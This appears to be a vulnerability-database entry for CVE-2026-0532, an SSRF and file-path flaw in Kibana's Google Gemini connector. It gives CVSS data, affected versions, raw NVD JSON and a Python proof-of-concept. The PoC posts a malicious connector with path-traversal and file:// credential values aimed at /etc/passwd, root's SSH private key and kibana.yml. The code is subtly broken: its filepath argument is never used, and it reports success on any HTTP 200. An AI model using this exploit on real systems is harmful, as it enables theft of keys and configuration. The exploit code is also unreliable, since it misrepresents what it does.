Security Vulnerability Report
CVE-2026-0532 CVSS 8.6 HIGH

CVE-2026-0532

Published: 2026-01-14 11:15:51
Last Modified: 2026-04-15 00:35:42

Description

External Control of File Name or Path (CWE-73) combined with Server-Side Request Forgery (CWE-918) can allow an attacker to cause arbitrary file disclosure through a specially crafted credentials JSON payload in the Google Gemini connector configuration. This requires an attacker to have authenticated access with privileges sufficient to create or modify connectors (Alerts & Connectors: All). The server processes a configuration without proper validation, allowing for arbitrary network requests and for arbitrary file reads.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Elastic Kibana 8.x < 8.19.10
Elastic Kibana 9.x < 9.1.10
Elastic Kibana 9.x < 9.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2026-0532 PoC - Arbitrary File Read via Gemini Connector
# Target: Elastic Kibana with vulnerable Gemini connector

TARGET = "https://kibana.example.com"
API_KEY = "your-api-key-with-connector-permissions"


def exploit_file_read(filepath):
    """
    Exploit to read arbitrary files through Gemini connector config
    """
    headers = {
        "Content-Type": "application/json",
        "kbn-xsrf": "true",
        "Authorization": f"ApiKey {API_KEY}"
    }

    # Malicious connector payload with file path traversal
    payload = {
        "name": "Malicious Gemini Connector",
        "connectorType": "gemini",
        "config": {
            "apiKey": "malicious-key"
        },
        "secrets": {
            # File path traversal to read /etc/passwd
            "credentials": json.dumps({
                "type": "service_account",
                "project_id": "evil",
                "private_key_id": "../../../etc/passwd",
                "private_key": "file:///etc/passwd"
            })
        }
    }

    endpoint = f"{TARGET}/api/actions/connector"
    response = requests.post(endpoint, headers=headers, json=payload, verify=False)

    if response.status_code == 200:
        result = response.json()
        print(f"[+] File read successful: {filepath}")
        print(f"[+] Response: {json.dumps(result, indent=2)}")
    else:
        print(f"[-] Exploit failed: {response.status_code}")
        print(response.text)


if __name__ == "__main__":
    # Target sensitive files
    files = ["/etc/passwd", "/root/.ssh/id_rsa", "/etc/kibana/kibana.yml"]
    for f in files:
        exploit_file_read(f)

References

https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-05/384524

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0532", "sourceIdentifier": "[email protected]", "published": "2026-01-14T11:15:50.510", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "External Control of File Name or Path (CWE-73) combined with Server-Side Request Forgery (CWE-918) can allow an attacker to cause arbitrary file disclosure through a specially crafted credentials JSON payload in the Google Gemini connector configuration. This requires an attacker to have authenticated access with privileges sufficient to create or modify connectors (Alerts & Connectors: All). The server processes a configuration without proper validation, allowing for arbitrary network requests and for arbitrary file reads."}, {"lang": "es", "value": "Control Externo de Nombre o Ruta de Archivo (CWE-73) combinado con Falsificación de Petición del Lado del Servidor (CWE-918) puede permitir a un atacante causar la divulgación arbitraria de archivos a través de una carga útil JSON de credenciales especialmente diseñada en la configuración del conector de Google Gemini. Esto requiere que un atacante tenga acceso autenticado con privilegios suficientes para crear o modificar conectores (Alertas y Conectores: Todos). El servidor procesa una configuración sin la validación adecuada, permitiendo peticiones de red arbitrarias y lecturas de archivos arbitrarias."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-05/384524", "source": "[email protected]"}]}}